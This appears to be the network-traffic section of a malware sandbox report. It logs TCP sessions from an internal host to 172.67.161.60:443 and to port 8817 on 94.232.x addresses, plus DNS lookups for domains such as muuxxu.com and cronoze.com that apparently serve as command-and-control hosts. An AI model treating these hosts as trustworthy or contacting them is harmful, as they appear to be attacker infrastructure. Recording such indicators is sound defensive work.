                                                                                                                                Dec 17, 2024 17:58:12.443600893 CET50023443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:12.443622112 CET44350023172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:12.443680048 CET50023443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:12.443690062 CET44350023172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:12.443738937 CET50023443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:12.443778038 CET44350023172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:12.443828106 CET50023443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:12.444029093 CET50023443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:12.444042921 CET44350023172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:12.542110920 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:12.542187929 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:12.542367935 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:12.542732000 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:12.542758942 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:13.796139002 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:13.796343088 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:13.808022976 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:13.808049917 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:13.809741974 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:13.809758902 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:14.579104900 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:14.579194069 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:14.579224110 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:14.579274893 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:14.579287052 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:14.579344988 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:14.579380989 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:14.579448938 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:14.579526901 CET50024443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:14.579538107 CET44350024172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:14.663384914 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:14.663481951 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:14.663605928 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:14.663872957 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:14.663908005 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:16.504403114 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:16.504487991 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:16.505201101 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:16.505237103 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:16.506817102 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:16.506845951 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:17.220483065 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:17.220634937 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:17.220670938 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:17.220736980 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:17.220768929 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:17.220845938 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:17.221127987 CET50025443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:17.221148014 CET44350025172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:17.311198950 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:17.311264038 CET44350026172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:17.311582088 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:17.314266920 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:17.314301968 CET44350026172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:18.688625097 CET44350026172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:18.688811064 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:18.690706015 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:18.690706968 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:18.690742016 CET44350026172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:18.690788984 CET44350026172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:19.382941008 CET44350026172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:19.383192062 CET44350026172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:19.383229971 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:19.383349895 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:19.386286974 CET50026443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:19.386320114 CET44350026172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:19.894349098 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:19.894454002 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:19.894555092 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:19.894983053 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:19.895018101 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:21.284288883 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:21.286506891 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:21.288302898 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:21.288302898 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:21.288320065 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:21.288342953 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:21.970990896 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:21.971093893 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:21.971179008 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:21.971237898 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:21.971297026 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:21.971349001 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:21.971415997 CET50027443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:21.971450090 CET44350027172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:22.151504993 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:22.151560068 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:22.151623011 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:22.152048111 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:22.152061939 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:23.377382994 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:23.377684116 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:23.378668070 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:23.378680944 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:23.379378080 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:23.379385948 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:24.133371115 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:24.133455038 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:24.133485079 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:24.133577108 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:24.133584023 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:24.133635998 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:24.133668900 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:24.133797884 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:24.133879900 CET50029443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:24.133893967 CET44350029172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:24.269403934 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:24.269494057 CET44350030172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:24.269603968 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:24.270076036 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:24.270113945 CET44350030172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:25.642324924 CET44350030172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:25.642401934 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:25.643090010 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:25.643100023 CET44350030172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:25.645025015 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:25.645030975 CET44350030172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:26.344254017 CET44350030172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:26.344361067 CET44350030172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:26.344389915 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:26.344455957 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:26.344697952 CET50030443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:26.344733953 CET44350030172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:26.445158958 CET50031443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:26.445207119 CET44350031172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:26.445288897 CET50031443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:26.445574999 CET50031443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:26.445588112 CET44350031172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:27.665755987 CET44350031172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:27.665847063 CET50031443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.314641953 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.318546057 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.318648100 CET50041443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.318664074 CET44350041172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.402411938 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.402441978 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.402620077 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.403079987 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:49.403090954 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:49.949768066 CET497338817192.168.2.694.232.46.11
                                                                                                                                Dec 17, 2024 17:58:50.774478912 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:50.776772022 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:50.778570890 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:50.778570890 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:50.778578997 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:50.778594971 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.486824989 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.486913919 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.486943960 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.486983061 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.487502098 CET50042443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.487519026 CET44350042172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.581815958 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.581859112 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:51.581996918 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.584578991 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:51.584594965 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:52.798644066 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:52.798751116 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:52.799355030 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:52.799360991 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:52.800899029 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:52.800905943 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.536463022 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.536951065 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.536977053 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.540640116 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.542221069 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.542284012 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.542403936 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.542433977 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.542433977 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.542449951 CET44350043172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.542601109 CET50043443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.589862108 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.589907885 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:53.592765093 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.596483946 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:53.596503019 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.122675896 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.123717070 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.138436079 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.138452053 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.142015934 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.142029047 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905644894 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905726910 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.905750036 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905829906 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.905836105 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905877113 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.905895948 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.905966997 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.906122923 CET50044443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.906136036 CET44350044172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.970822096 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.970863104 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:55.970980883 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.971275091 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:55.971292019 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.231352091 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.231538057 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.233197927 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.233197927 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.233222008 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.233246088 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.984832048 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.985017061 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.985059023 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.985112906 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:57.985115051 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:57.985162973 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.007528067 CET50045443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.007572889 CET44350045172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:58.518246889 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.518296003 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:58.518381119 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.518672943 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:58.518682957 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:59.753266096 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:59.753329992 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:59.754090071 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:59.754101038 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:58:59.756243944 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:58:59.756252050 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:00.732199907 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:00.732479095 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:00.736578941 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:00.780503988 CET50046443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:00.780536890 CET44350046172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:01.182480097 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:01.182529926 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:01.182902098 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:01.183339119 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:01.183356047 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:02.562967062 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:02.563071966 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:02.563762903 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:02.563776970 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:02.566167116 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:02.566181898 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.243491888 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.243577003 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.243618965 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.243639946 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.243751049 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.245599985 CET50047443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.245615005 CET44350047172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.373965025 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.374032021 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:03.374320030 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.375021935 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:03.375040054 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:04.593728065 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:04.593816042 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:04.594288111 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:04.594301939 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:04.595927954 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:04.595937014 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286158085 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286266088 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.286294937 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286585093 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.286680937 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286739111 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.286768913 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.286911011 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.287121058 CET50048443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.287133932 CET44350048172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.726254940 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.726303101 CET44350049172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:05.726365089 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.726820946 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:05.726835966 CET44350049172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:06.964826107 CET44350049172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:06.965173006 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:21.761949062 CET44350049172.67.161.60192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:21.762017012 CET50049443192.168.2.6172.67.161.60
                                                                                                                                Dec 17, 2024 17:59:23.422642946 CET88175001194.232.40.41192.168.2.6
                                                                                                                                Dec 17, 2024 17:59:23.430560112 CET500118817192.168.2.694.232.40.41
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 17:55:07.339040041 CET | 64678 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 17:55:08.125819921 CET | 53 | 64678 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 17:56:04.530534029 CET | 50870 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 17:56:05.528865099 CET | 50870 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 17:56:05.592211962 CET | 53 | 50870 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 17:56:05.669168949 CET | 53 | 50870 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 17:56:47.948262930 CET | 62560 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 17:56:48.225836039 CET | 53 | 62560 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 17:56:56.508414984 CET | 54701 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 17:56:56.827999115 CET | 53 | 54701 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 17:55:07.339040041 CET | 192.168.2.6 | 1.1.1.1 | 0xcaee | Standard query (0) | muuxxu.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:04.530534029 CET | 192.168.2.6 | 1.1.1.1 | 0x90e6 | Standard query (0) | cronoze.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:05.528865099 CET | 192.168.2.6 | 1.1.1.1 | 0x90e6 | Standard query (0) | cronoze.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:47.948262930 CET | 192.168.2.6 | 1.1.1.1 | 0x5f45 | Standard query (0) | proliforetka.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:56.508414984 CET | 192.168.2.6 | 1.1.1.1 | 0x8d97 | Standard query (0) | dogirafer.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 17:55:08.125819921 CET | 1.1.1.1 | 192.168.2.6 | 0xcaee | No error (0) | muuxxu.com |  | 94.232.46.11 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:55:20.828512907 CET | 1.1.1.1 | 192.168.2.6 | 0x1eab | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:55:20.828512907 CET | 1.1.1.1 | 192.168.2.6 | 0x1eab | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:05.592211962 CET | 1.1.1.1 | 192.168.2.6 | 0x90e6 | No error (0) | cronoze.com |  | 94.232.40.41 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:05.669168949 CET | 1.1.1.1 | 192.168.2.6 | 0x90e6 | No error (0) | cronoze.com |  | 94.232.40.41 | A (IP address) | IN (0x0001) | false
